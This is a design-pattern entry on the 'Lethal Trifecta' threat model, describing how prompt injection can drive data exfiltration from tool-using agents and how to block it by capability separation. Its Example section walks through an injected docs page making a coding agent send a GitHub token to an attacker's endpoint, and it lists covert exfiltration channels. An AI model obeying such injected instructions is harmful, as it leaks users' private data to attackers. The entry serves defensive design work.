VIII · Safety & ControlEmerging

Lethal Trifecta Threat Model

also known as Willison Trifecta, Three-Capabilities Exfiltration Risk

Block prompt-injection-driven exfiltration by ensuring no single agent execution path holds all three of: access to private data, exposure to untrusted content, and an outbound communication channel.

Context

A team builds a tool-using agent that combines three capabilities in the same execution: it reads data the operator wants to keep private (tokens, customer records, internal files), it ingests content from sources the operator does not control (emails, fetched web pages, third-party API responses, MCP servers from unknown providers), and it can call tools that transmit information outside the trust boundary (public HTTP requests, image-URL renders, link previews, chat webhooks, even error reports). This combination is extremely common — email assistants, browsing agents, coding agents with model-context-protocol servers, and any large language model that can both query internal systems and reach the public internet.

Problem

An attacker only has to plant one well-crafted prompt-injection payload in any piece of untrusted content the agent will read. Once that payload reaches a model that also has access to private data and an outbound channel, the injection can instruct the model to fetch the private data and ship it out, and the model has no reliable way to refuse, because instructions inside data look indistinguishable from instructions in the system prompt. Filtering the untrusted content is unreliable, prompting the model to ignore embedded instructions is unreliable, and the outbound channels are easy to overlook — image URLs, link previews, error reports, and ordinary tool calls all serve as exfiltration paths.

Forces

  • Each of the three capabilities is individually useful, and many real agents need all three.
  • Prompt-injection content is indistinguishable from legitimate content to the model.
  • Outbound channels are easy to overlook — image URLs, link previews, error reports, and tool calls can all serve as exfiltration paths.
  • Removing capabilities reduces agent utility; the operator must consciously trade utility for safety.

Example

A coding agent runs with the user's private GitHub token (private data), browses a third-party documentation site for setup instructions (untrusted content), and can post to a chat webhook for status updates (outbound channel). A prompt-injection payload hidden in a third-party docs page tells the model to fetch the GitHub token and POST it to attacker.example via the chat webhook. The trifecta is complete; the attack succeeds. Removing any one leg — running browsing in a tokenless subagent, disabling the chat webhook for the browsing leg, or stripping outbound DNS — would have blocked it.

Diagram

Solution

Therefore:

Treat the three capabilities — **private-data read**, **untrusted-content ingest**, and **outbound communication** — as a tagged capability set on every tool and data source. For each agent execution path, enforce at orchestration time that at least one of the three is missing. Concrete moves: split the agent into two runs (one that reads private data, one that reads untrusted content), strip outbound network for the run that touches both, or sanitise untrusted content into typed fields before it reaches private-data context. The check is performed by the host, not by guardrail prompts.

What this pattern forbids. An execution path may not simultaneously read private data, ingest untrusted content, and reach an outbound channel; tools missing capability tags must be treated as carrying all three.

And the patterns that stand alongside it, or against it —

  • complementsDual LLM PatternSplit agent work between a privileged model that holds tool access and a quarantined model that reads untrusted content, exchanging only opaque references between them.
  • complementsPrompt Injection DefenseTag user-supplied or tool-supplied content as untrusted and refuse to follow instructions found inside it.
  • complementsInput/Output Guardrails★★Validate inputs before they reach the model and outputs before they reach the user.
  • complementsSandbox Isolation★★Run agent-emitted code or actions in a contained environment with restricted filesystem, network, and process privileges.
  • complementsTool Output Poisoning DefenseTreat tool output as untrusted content and apply instruction-stripping plus per-tool trust labels.
  • complementsControl-Flow IntegrityTreat the agent's planned step sequence as a trusted control-flow graph that tool outputs, retrieved content, and user-supplied data cannot redirect at runtime.
  • complementsAction Selector PatternEliminate the feedback channel from tool outputs back into the agent's reasoning step by having the agent select actions from a fixed catalog rather than free-form generation over tool output.

Neighbourhood

Click any neighbour to follow the language. Scroll to zoom, drag to pan.